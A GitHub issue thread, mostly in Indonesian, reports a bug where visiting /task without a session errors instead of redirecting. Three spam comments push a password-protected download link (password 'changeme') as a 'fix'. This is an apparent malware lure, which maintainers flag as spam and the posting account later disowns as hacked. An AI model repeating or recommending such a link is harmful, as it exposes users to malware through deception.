### ISSUE TITLE
Bug: navigasi /task saat tidak log in

### ISSUE THREAD

**Issue by Klrfl** [dev-nichola/open-30-days-koding-challenge#2]
## Deskripsi bug
Saat tidak memiliki sesi dan mencoba navigasi ke `/task`, akan muncul error.

## Expected behavior
Seharusnya redirect ke home page atau halaman log in

## Reproduksi
Pastikan tidak sedang log in dengan log out. Jika sudah navigasi ke `/task`

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Klrfl** [comment]
@dev-nichola komennya hapus nih spam

**Comment by dev-nichola** [comment]
itu siapa?

**Comment by Klrfl** [comment]
ga tau bot. Org komennya sma persis gitu isinya

**Comment by amir1387aht** [comment]
Guys Please Listen To Me. I Think Im Hacked, Please Don't Open That Link I Send, I Changed My Password But Please Don't Trust Links From Me

**Comment by dev-nichola** [comment]
okeyy letsgoo
